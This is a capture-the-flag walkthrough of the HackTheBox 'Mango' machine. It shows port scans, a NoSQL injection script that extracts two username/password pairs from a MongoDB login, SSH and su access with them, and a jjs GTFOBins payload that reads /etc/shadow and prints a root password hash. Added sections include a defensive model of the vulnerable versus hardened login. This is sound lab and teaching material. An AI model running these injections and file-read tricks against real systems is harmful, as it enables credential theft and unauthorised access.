This HackTheBox machine was one of my first attempts at a box that relied fully on a web application, with no CMS involved. Personally, web application security is the area I feel weakest in, so it was definitely a challenge to work through it and gain access to the host. Unfortunately, I don't have many resources to share as references other than the ones below.
Just like my other walkthroughs, I hope this one is as enjoyable.
References
Let’s begin!
Initial Enumeration: Footprinting and Scanning
First off, we need to identify how to reach the system. In other words, we need to identify which services this machine exposes.
Let's start by adding this machine's IP address to the hosts file and create an alias:
My go-to tools in this phase, which are typically used by many to start enumerating, are:
masscan: a very fast port scanner that finds open ports quickly. To me it is a tool to narrow down the scope of the enumeration so we can focus nmap on the open ports only.
Here, I designate the interface to use when communicating with the HTB machine (-e), which is the HTB VPN interface, along with -p for the port range to target (here ALL TCP and UDP ports) and the transmission rate in packets per second (--rate). Alternatively, you could run something like this:
nmap -p- --min-rate=1000 -T4
nmap: I think most people in the information technology and security space know what nmap does. It is a very versatile port scanner which also lets you run scripts to further probe the services found. Like anything, it is a useful tool but it can also be damaging if the user is not careful.
What I typically start with when using nmap is:
-sC: to use all default non-intrusive nmap scripts on each service
-sV: to get the service version information which is definitely important for us
-p: to designate the port we will be targeting
-vvvv: for extended verbosity (as I like as many details as I can get)
MASSCAN
root@kali:~/Documents/HTB-Labs/Mango# masscan -e tun1 -p1-65535,U:1-65535 10.10.10.162 --rate=1000
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-01-15 02:23:01 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 443/tcp on 10.10.10.162
Discovered open port 22/tcp on 10.10.10.162
Discovered open port 80/tcp on 10.10.10.162
As you can see, we only found a few basic ports: two for HTTP/HTTPS traffic and one for SSH. Let's inspect them further with nmap.
root@kali:~/Documents/HTB-Labs/Mango# nmap -sC -sV -vvv -p22,80,443 -oX Mango_TCP.xml -oN Mango-TCP.log mango.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-14 21:29 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:29
Completed NSE at 21:29, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:29
Completed NSE at 21:29, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:29
Completed NSE at 21:29, 0.00s elapsed
Initiating Ping Scan at 21:29
Scanning mango.htb (10.10.10.162) [4 ports]
Completed Ping Scan at 21:29, 0.16s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 21:29
Scanning mango.htb (10.10.10.162) [3 ports]
Discovered open port 443/tcp on 10.10.10.162
Discovered open port 22/tcp on 10.10.10.162
Discovered open port 80/tcp on 10.10.10.162
Completed SYN Stealth Scan at 21:29, 0.15s elapsed (3 total ports)
Initiating Service scan at 21:29
Scanning 3 services on mango.htb (10.10.10.162)
Completed Service scan at 21:29, 12.77s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against mango.htb (10.10.10.162)
Retrying OS detection (try #2) against mango.htb (10.10.10.162)
Initiating Traceroute at 21:29
Completed Traceroute at 21:29, 0.13s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 21:29
Completed Parallel DNS resolution of 2 hosts. at 21:29, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
NSE: Script scanning 10.10.10.162.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:29
Completed NSE at 21:29, 5.55s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:29
Completed NSE at 21:29, 1.08s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:29
Completed NSE at 21:29, 0.00s elapsed
Nmap scan report for mango.htb (10.10.10.162)
Host is up, received echo-reply ttl 63 (0.12s latency).
Scanned at 2020-01-14 21:29:24 EST for 24s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDXYCdNRHET98F1ZTM+H8yrD9KXeRjvIk9e78JkHdzcqCq6zcvYIqEZReb3FSCChJ9mxK6E6vu5xBY7R6Gi0V31dx0koyaieEMd67PU+9UcjaAujbDS3UgYzySN+c5GV/ssmA6wWHu4zz+k+qztqdYFPh0/TgrC/wNPWHOKdpivgoyk3+F/retyGdKUNGjypXrw6v1faHiLOIO+zNHorxB304XmSLEFswiOS8UsjplIbud2KhWPEkY4s4FyjlpfpVdgPljbjijm7kcPNgpTXLXE51oNE3Q5w7ufO5ulo3Pqm0x+4d+SEpCE4g0+Yb020zK+JlKsp2tFJyLqTLan1buN
| 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDqSZ4iBMzBrw2lEFKYlwO2qmw0WPf76ZhnvWGK+LJcHxvNa4OQ/hGuBWCjVlTcMbn1Te7D8jGwPgbcVpuaEld8=
| 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB1sFdLYacK+1f4J+i+NCAhG+bj8xzzydNhqA1Ndo/xt
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open ssl/ssl syn-ack ttl 63 Apache httpd (SSL-only mode)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN/localityName=None/emailAddress=admin@mango.htb/organizationalUnitName=None
| Issuer: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN/localityName=None/emailAddress=admin@mango.htb/organizationalUnitName=None
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-09-27T14:21:19
| Not valid after: 2020-09-26T14:21:19
| MD5: b797 d14d 485f eac3 5cc6 2fed bb7a 2ce6
| SHA-1: b329 9eca 2892 af1b 5895 053b f30e 861f 1c03 db95
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.18 (94%), Linux 3.16 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 2.6.32 (92%), Linux 3.11 (92%), Linux 3.7 - 3.10 (92%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.80%E=4%D=1/14%OT=22%CT=%CU=31261%PV=Y%DS=2%DC=T%G=N%TM=5E1E791C%P=x86_64-pc-linux-gnu)
SEQ(SP=FE%GCD=1%ISR=102%TI=Z%CI=Z%II=I%TS=A)
OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)
WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)
ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 42.933 days (since Mon Dec 2 23:06:06 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=253 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 124.42 ms 10.10.14.1
2 119.18 ms mango.htb (10.10.10.162)
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:29
Completed NSE at 21:29, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:29
Completed NSE at 21:29, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:29
Completed NSE at 21:29, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.57 seconds
Raw packets sent: 61 (4.280KB) | Rcvd: 43 (3.180KB)
From the port scan, we found HTTP is available, but we get an HTTP 403 status code, meaning we are forbidden from accessing http://mango.htb. At the same time, the HTTPS service presents a certificate whose CN is not mango.htb but staging-order.mango.htb. We now need to enumerate mango.htb and also add staging-order.mango.htb to the hosts file so we can enumerate it as well.
Using curl on http://mango.htb gives us the same HTTP 403 status code we saw through nmap, which confirms that for now HTTPS is the way to go. Before we move forward, it is worth noting that both the HTTP and HTTPS services on this host support the following HTTP methods:
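The certificate CN is the only place this second hostname shows up, so it pays to harvest such names automatically. The following is an added example (not part of the original write-up) that pulls certificate names out of nmap normal (-oN) output and turns them into /etc/hosts candidates; the sample text is a trimmed, constructed copy of the ssl-cert block above, and the field labels assumed are the ones nmap's ssl-cert NSE script prints.

```python
"""Harvest hostnames from the TLS certificate fields in nmap -oN output
and turn them into /etc/hosts candidates for further enumeration.
"""
import re

# Constructed sample: the relevant lines of the scan above, trimmed.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for mango.htb (10.10.10.162)
Host is up, received echo-reply ttl 63 (0.12s latency).
PORT    STATE SERVICE REASON         VERSION
80/tcp  open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
|_http-title: 403 Forbidden
443/tcp open  ssl/ssl syn-ack ttl 63 Apache httpd (SSL-only mode)
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./countryName=IN
| Issuer: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after:  2020-09-26T14:21:19
"""

REPORT_RE = re.compile(
    r"^Nmap scan report for (\S+) \((\d{1,3}(?:\.\d{1,3}){3})\)$", re.M)
SUBJECT_RE = re.compile(r"^\|\s*ssl-cert: Subject: (.*)$", re.M)
# nmap prints SANs as "| Subject Alternative Name: DNS:a, DNS:b" when present.
SAN_RE = re.compile(r"^\|\s*Subject Alternative Name: (.*)$", re.M)
HOSTNAME_RE = re.compile(r"^[a-z0-9.*-]+\.[a-z]{2,}$", re.I)


def parse_subject(subject):
    """Split 'commonName=x/organizationName=y/...' into a dict."""
    fields = {}
    for part in subject.split("/"):
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key] = value
    return fields


def extract_cert_names(text):
    """Return hostnames found in certificate CNs and DNS SANs, in order,
    without duplicates; values that do not look like hostnames are dropped."""
    names = []
    for subject in SUBJECT_RE.findall(text):
        cn = parse_subject(subject).get("commonName", "")
        if HOSTNAME_RE.match(cn) and cn not in names:
            names.append(cn)
    for san in SAN_RE.findall(text):
        for entry in san.split(","):
            entry = entry.strip()
            if entry.startswith("DNS:"):
                host = entry[4:]
                if HOSTNAME_RE.match(host) and host not in names:
                    names.append(host)
    return names


def hosts_entries(text, known=()):
    """Build '<ip> <name>' lines for every certificate name that is not the
    scanned name or already known. Wildcard names are skipped because they
    cannot be placed in a hosts file literally."""
    match = REPORT_RE.search(text)
    if not match:
        return []
    scanned_name, ip = match.groups()
    skip = set(known) | {scanned_name}
    return [f"{ip} {name}" for name in extract_cert_names(text)
            if name not in skip and not name.startswith("*")]


if __name__ == "__main__":
    for line in hosts_entries(SAMPLE_NMAP_OUTPUT):
        print(line)
```

Feed it a real -oN file instead of the constructed sample and the output is ready to append to /etc/hosts.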
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
With -X GET we specify the HTTP request method, and the extra verbosity (-v) always comes in handy. Note to self: as curl tells us, GET is already inferred without -X, but I like stating the HTTP method explicitly for my own reference.
root@kali:~/Documents/HTB-Labs/Mango# curl -v -X GET http://mango.htb
Note: Unnecessary use of -X or --request, GET is already inferred.
* Trying 10.10.10.162:80...
* TCP_NODELAY set
* Connected to mango.htb (10.10.10.162) port 80 (#0)
> GET / HTTP/1.1
> Host: mango.htb
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 403 Forbidden
< Date: Sun, 31 May 2020 02:54:08 GMT
< Server: Apache/2.4.29 (Ubuntu)
< Content-Length: 274
< Content-Type: text/html; charset=iso-8859-1
<
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at mango.htb Port 80</address>
</body></html>
* Connection #0 to host mango.htb left intact
Now let's sample what's on HTTPS. We need -k to connect insecurely, i.e. to skip certificate verification since we cannot validate the signer, and simply focus on what the verbose output and the HTTP HEAD method give us.
As with -X GET, we could use -I to send a HEAD request, but like I said, I like showing the method I'm using for my own reference.
root@kali:~/Documents/HTB-Labs/Mango# curl -v -X HEAD -k https://mango.htb
Warning: Setting custom HTTP method to HEAD with -X/--request may not work the
Warning: way you want. Consider using -I/--head instead.
* Trying 10.10.10.162:443...
* TCP_NODELAY set
* Connected to mango.htb (10.10.10.162) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
* CAfile: /etc/ssl/certs/ca-certificates.crt
CApath: /etc/ssl/certs
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
* ALPN, server accepted to use http/1.1
* Server certificate:
* subject: C=IN; ST=None; L=None; O=Mango Prv Ltd.; OU=None; CN=staging-order.mango.htb; emailAddress=admin@mango.htb
* start date: Sep 27 14:21:19 2019 GMT
* expire date: Sep 26 14:21:19 2020 GMT
* issuer: C=IN; ST=None; L=None; O=Mango Prv Ltd.; OU=None; CN=staging-order.mango.htb; emailAddress=admin@mango.htb
* SSL certificate verify result: self signed certificate (18), continuing anyway.
> HEAD / HTTP/1.1
> Host: mango.htb
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sun, 31 May 2020 02:19:31 GMT
< Server: Apache/2.4.29 (Ubuntu)
< Content-Type: text/html; charset=UTF-8
* no chunk, no close, no size. Assume close to signal end
<
* TLSv1.2 (IN), TLS alert, close notify (256):
* Closing connection 0
* TLSv1.2 (OUT), TLS alert, close notify (256):
Adding staging-order did not reveal anything, but the /analytics.php page on mango.htb shows a system interface where it is possible to upload a payload. Even though it looked like it would accept uploads in the json, js and xml formats, this route did not work either and is more of a rabbit hole, so for the sake of this write-up I will simply skip it.
If we look back at what we found in the port scanning phase, HTTP is open but returns 403 Forbidden when accessed as http://mango.htb. We also know from the certificate that staging-order exists, so why don't we try accessing http://staging-order.mango.htb/?
AND that worked!! We got an admin login page, but on a plain HTTP site?!
After attempting some basic SQLi to bypass authentication, which turned out to be a waste of time, I had to seek further clues from other members in the HTB Forum, and someone brought up the possibility that the name of the site is a clue in itself and has nothing to do with mangoes. This made me wonder whether "Mango" and "Mongo", as in MongoDB, could be related.
Exploitation and Gaining Access
As we only have two inputs to interact with the site, SQL injection seems to be the most logical approach, and the name guessing mentioned earlier gave me some reading to do.
Something I had not realized, and found out from my research, is that MongoDB is a NoSQL database, and this led me to the technique of NoSQL injection against it.
This pointed me to a NoSQL injection script that can dump usernames and passwords, which we can try; a link is provided in the overview section as reference.
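To make clear what this NoSQL injection actually exploits, here is an added example (not code from the box or from the enum script) that models the vulnerable login handler beside a hardened one. The user records are constructed, and the matcher is a minimal in-memory stand-in for MongoDB's $regex and $ne operators rather than the real driver.

```python
"""Query-operator injection in a MongoDB-style login, and the fix.

The flaw: web frameworks such as PHP or Express decode 'field[key]=value'
into a nested structure, and a login that passes the decoded fields straight
into its query lets the client supply operators instead of a credential.
"""
import re
from urllib.parse import parse_qsl

# Constructed stand-in for the users collection; credentials are made up.
USERS = [
    {"username": "admin", "password": "s3cret-admin"},
    {"username": "mango", "password": "s3cret-mango"},
]


def parse_form(body):
    """Decode a urlencoded body the way PHP/Express do: a key such as
    'username[$regex]' becomes {'username': {'$regex': ...}}."""
    form = {}
    for key, value in parse_qsl(body):
        nested = re.fullmatch(r"(\w+)\[([^\]]+)\]", key)
        if nested:
            form.setdefault(nested.group(1), {})[nested.group(2)] = value
        else:
            form[key] = value
    return form


def matches(doc_value, condition):
    """Subset of MongoDB matching semantics: equality, $ne and $regex."""
    if not isinstance(condition, dict):
        return doc_value == condition
    for op, arg in condition.items():
        if op == "$ne":
            if doc_value == arg:
                return False
        elif op == "$regex":
            if doc_value is None or re.search(arg, doc_value) is None:
                return False
        else:
            raise ValueError(f"unsupported operator {op}")
    return True


def find_one(query):
    """Return the first user document satisfying every field condition."""
    for doc in USERS:
        if all(matches(doc.get(field), cond) for field, cond in query.items()):
            return doc
    return None


def login_vulnerable(body):
    """Feeds the parsed fields straight into the query. A body such as
    'username[$regex]=^a&password[$ne]=x' no longer checks a credential;
    it asks the database a yes/no question about the stored values, which
    is exactly the oracle a character-by-character dump relies on."""
    form = parse_form(body)
    doc = find_one({"username": form.get("username"),
                    "password": form.get("password")})
    return doc["username"] if doc else None


def login_hardened(body):
    """Same query, but only plain strings may reach it. Rejecting any
    non-string field closes the operator channel entirely."""
    form = parse_form(body)
    username, password = form.get("username"), form.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        return None
    doc = find_one({"username": username, "password": password})
    return doc["username"] if doc else None


if __name__ == "__main__":
    probe = "username[$regex]=^adm&password[$ne]=x"
    print("vulnerable:", login_vulnerable(probe))  # admin
    print("hardened:  ", login_hardened(probe))    # None
```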
NOSQL USER-PASS ENUM SCRIPT
root@kali:~/Documents/HTB-Labs/Mango# python3 nosqli-user-pass-enum.py -u http://staging-order.mango.htb -m POST -up username -pp password -op login:login -ep username
No pattern starts with '0'
No pattern starts with '1'
No pattern starts with '2'
No pattern starts with '3'
No pattern starts with '4'
No pattern starts with '5'
No pattern starts with '6'
No pattern starts with '7'
No pattern starts with '8'
No pattern starts with '9'
Pattern found that starts with 'a'
Pattern found: ad
Pattern found: adm
Pattern found: admi
Pattern found: admin
username found: admin
No pattern starts with 'b'
No pattern starts with 'c'
No pattern starts with 'd'
No pattern starts with 'e'
No pattern starts with 'f'
No pattern starts with 'g'
No pattern starts with 'h'
No pattern starts with 'i'
No pattern starts with 'j'
No pattern starts with 'k'
No pattern starts with 'l'
Pattern found that starts with 'm'
Pattern found: ma
Pattern found: man
Pattern found: mang
Pattern found: mango
username found: mango
No pattern starts with 'n'
No pattern starts with 'o'
No pattern starts with 'p'
No pattern starts with 'q'
No pattern starts with 'r'
No pattern starts with 's'
No pattern starts with 't'
No pattern starts with 'u'
No pattern starts with 'v'
No pattern starts with 'w'
No pattern starts with 'x'
No pattern starts with 'y'
No pattern starts with 'z'
No pattern starts with 'A'
No pattern starts with 'B'
No pattern starts with 'C'
No pattern starts with 'D'
No pattern starts with 'E'
No pattern starts with 'F'
No pattern starts with 'G'
No pattern starts with 'H'
No pattern starts with 'I'
No pattern starts with 'J'
No pattern starts with 'K'
No pattern starts with 'L'
No pattern starts with 'M'
No pattern starts with 'N'
No pattern starts with 'O'
No pattern starts with 'P'
No pattern starts with 'Q'
No pattern starts with 'R'
No pattern starts with 'S'
No pattern starts with 'T'
No pattern starts with 'U'
No pattern starts with 'V'
No pattern starts with 'W'
No pattern starts with 'X'
No pattern starts with 'Y'
No pattern starts with 'Z'
No pattern starts with '!'
No pattern starts with '"'
No pattern starts with '#'
No pattern starts with '%'
No pattern starts with '''
No pattern starts with '('
No pattern starts with ')'
No pattern starts with ','
No pattern starts with '-'
No pattern starts with '/'
No pattern starts with ':'
No pattern starts with ';'
No pattern starts with '<'
No pattern starts with '='
No pattern starts with '>'
No pattern starts with '@'
No pattern starts with '['
No pattern starts with ']'
No pattern starts with '_'
No pattern starts with '`'
No pattern starts with '{'
No pattern starts with '}'
No pattern starts with '~'
No pattern starts with ' '
No pattern starts with ' '
[output for the remaining whitespace characters garbled by line wrapping; none of them matched]
2 username(s) found:
admin
mango
AND we got some usernames. Now let's try the same but with the -ep password switch:
root@kali:~/Documents/HTB-Labs/Mango# python3 nosqli-user-pass-enum.py -u http://staging-order.mango.htb -m POST -up username -pp password -op login:login -ep password
No pattern starts with '0'
No pattern starts with '1'
No pattern starts with '2'
No pattern starts with '3'
No pattern starts with '4'
No pattern starts with '5'
No pattern starts with '6'
No pattern starts with '7'
No pattern starts with '8'
No pattern starts with '9'
No pattern starts with 'a'
No pattern starts with 'b'
No pattern starts with 'c'
No pattern starts with 'd'
No pattern starts with 'e'
No pattern starts with 'f'
No pattern starts with 'g'
Pattern found that starts with 'h'
Pattern found: h3
Pattern found: h3m
Pattern found: h3mX
Pattern found: h3mXK
Pattern found: h3mXK8
Pattern found: h3mXK8R
Pattern found: h3mXK8Rh
Pattern found: h3mXK8RhU
Pattern found: h3mXK8RhU~
Pattern found: h3mXK8RhU~f
Pattern found: h3mXK8RhU~f{
Pattern found: h3mXK8RhU~f{]
Pattern found: h3mXK8RhU~f{]f
Pattern found: h3mXK8RhU~f{]f5
Pattern found: h3mXK8RhU~f{]f5H
password found: h3mXK8RhU~f{]f5H
No pattern starts with 'i'
No pattern starts with 'j'
No pattern starts with 'k'
No pattern starts with 'l'
No pattern starts with 'm'
No pattern starts with 'n'
No pattern starts with 'o'
No pattern starts with 'p'
No pattern starts with 'q'
No pattern starts with 'r'
No pattern starts with 's'
Pattern found that starts with 't'
Pattern found: t9
Pattern found: t9K
Pattern found: t9Kc
Pattern found: t9KcS
Pattern found: t9KcS3
Pattern found: t9KcS3>
Pattern found: t9KcS3>!
Pattern found: t9KcS3>!0
Pattern found: t9KcS3>!0B
Pattern found: t9KcS3>!0B#
Pattern found: t9KcS3>!0B#2
password found: t9KcS3>!0B#2
No pattern starts with 'u'
No pattern starts with 'v'
No pattern starts with 'w'
No pattern starts with 'x'
No pattern starts with 'y'
No pattern starts with 'z'
No pattern starts with 'A'
No pattern starts with 'B'
No pattern starts with 'C'
No pattern starts with 'D'
No pattern starts with 'E'
No pattern starts with 'F'
No pattern starts with 'G'
No pattern starts with 'H'
No pattern starts with 'I'
No pattern starts with 'J'
No pattern starts with 'K'
No pattern starts with 'L'
No pattern starts with 'M'
No pattern starts with 'N'
No pattern starts with 'O'
No pattern starts with 'P'
No pattern starts with 'Q'
No pattern starts with 'R'
No pattern starts with 'S'
No pattern starts with 'T'
No pattern starts with 'U'
No pattern starts with 'V'
No pattern starts with 'W'
No pattern starts with 'X'
No pattern starts with 'Y'
No pattern starts with 'Z'
No pattern starts with '!'
No pattern starts with '"'
No pattern starts with '#'
No pattern starts with '%'
No pattern starts with '''
No pattern starts with '('
No pattern starts with ')'
No pattern starts with ','
No pattern starts with '-'
No pattern starts with '/'
No pattern starts with ':'
No pattern starts with ';'
No pattern starts with '<'
No pattern starts with '='
No pattern starts with '>'
No pattern starts with '@'
No pattern starts with '['
No pattern starts with ']'
No pattern starts with '_'
No pattern starts with '`'
No pattern starts with '{'
No pattern starts with '}'
No pattern starts with '~'
No pattern starts with ' '
No pattern starts with ' '
[output for the remaining whitespace characters garbled by line wrapping; none of them matched]
2 password(s) found:
h3mXK8RhU~f{]f5H
t9KcS3>!0B#2
This worked just as well as with -ep username, and now we have both credential sets:
admin:h3mXK8RhU~f{]f5H
mango:t9KcS3>!0B#2
Now, one thing left to do is to try the credentials on the HTTP login page and, if successful, SSH as either of the users.
Both users log in successfully on the login page and reach an 'Under Plantation' internal page (the same page for admin). Let's try mango first over SSH:
root@kali:~/Documents/HTB-Labs/Mango# ssh mango@mango.htb
mango@mango.htb's password:
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Feb 11 04:59:56 UTC 2020
System load: 0.0 Processes: 99
Usage of /: 25.8% of 19.56GB Users logged in: 0
Memory usage: 14% IP address for ens33: 10.10.10.162
Swap usage: 0%
* Kata Containers are now fully integrated in Charmed Kubernetes 1.16!
Yes, charms take the Krazy out of K8s Kata Kluster Konstruction.
https://ubuntu.com/kubernetes/docs/release-notes
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
122 packages can be updated.
18 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Feb 11 04:56:51 2020 from 10.10.14.49
mango@mango:~$ pwd
/home/mango
mango@mango:~$ ls -al
total 28
drwxr-xr-x 4 mango mango 4096 Sep 28 15:27 .
drwxr-xr-x 4 root root 4096 Sep 27 14:02 ..
lrwxrwxrwx 1 mango mango 9 Sep 27 14:31 .bash_history -> /dev/null
-rw-r--r-- 1 mango mango 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 mango mango 3771 Apr 4 2018 .bashrc
drwx------ 2 mango mango 4096 Sep 28 15:27 .cache
drwx------ 3 mango mango 4096 Sep 28 15:27 .gnupg
-rw-r--r-- 1 mango mango 807 Apr 4 2018 .profile
mango@mango:~$ ls /home
admin mango
We are in the system as mango, but we don't find much other than the two home directories for the mango and admin users. Since there is an admin home directory, let's try switching user to admin:
mango@mango:~$ su - admin
Password:
$ /bin/bash
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
admin@mango:/home/admin$
And we are also in as admin. Let's keep going:
admin@mango:/home/admin$ ls -ltr
total 4
-r-------- 1 admin admin 33 Sep 27 14:29 user.txt
admin@mango:/home/admin$ cat user.txt
79bf3**********************47e92
AND we found the user.txt flag file; time to attempt Privilege Escalation!
Privilege Escalation
Now, let's see what is accessible to the user admin, such as any globally executable binaries. As nothing else stood out on this host in terms of vulnerabilities to exploit, we must rely on enumeration.
Nothing stands out as special other than /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs. Looking at GTFOBins, there is a way to run it as an interpreter, just like python. There is also a way to do file reads, so we can go that route and try to read files owned by root to see whether we succeed.
Keep in mind that the user admin has no sudo rights, so everything we do has to run as a normal user.
admin@mango:/home/admin$ sudo -l
[sudo] password for admin:
Sorry, user admin may not run sudo on mango.
admin@mango:/home/admin$
Let's try the file-read approach with /etc/shadow, which only root (and sudo users) can read.
Successful Test
admin@mango:/home/admin$ echo 'var BufferedReader = Java.type("java.io.BufferedReader");
> var FileReader = Java.type("java.io.FileReader");
> var br = new BufferedReader(new FileReader("/etc/shadow"));
> while ((line = br.readLine()) != null) { print(line); }' | jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> var BufferedReader = Java.type("java.io.BufferedReader");
jjs> var FileReader = Java.type("java.io.FileReader");
jjs> var br = new BufferedReader(new FileReader("/etc/shadow"));
jjs> while ((line = br.readLine()) != null) { print(line); }
root:$6$6uG5902N$XonoH4wyYV2f8.7fEVXLe03mLoH3r1lnJ59s2jTWTAV.qZKZH.CXYjCWuUG5gLnioLpSTBA3F1LXqQAOqdAJN/:18166:0:99999:7:::
daemon:*:17941:0:99999:7:::
bin:*:17941:0:99999:7:::
sys:*:17941:0:99999:7:::
sync:*:17941:0:99999:7:::
games:*:17941:0:99999:7:::
man:*:17941:0:99999:7:::
lp:*:17941:0:99999:7:::
mail:*:17941:0:99999:7:::
news:*:17941:0:99999:7:::
uucp:*:17941:0:99999:7:::
proxy:*:17941:0:99999:7:::
www-data:*:17941:0:99999:7:::
backup:*:17941:0:99999:7:::
list:*:17941:0:99999:7:::
irc:*:17941:0:99999:7:::
gnats:*:17941:0:99999:7:::
nobody:*:17941:0:99999:7:::
systemd-network:*:17941:0:99999:7:::
systemd-resolve:*:17941:0:99999:7:::
syslog:*:17941:0:99999:7:::
messagebus:*:17941:0:99999:7:::
_apt:*:17941:0:99999:7:::
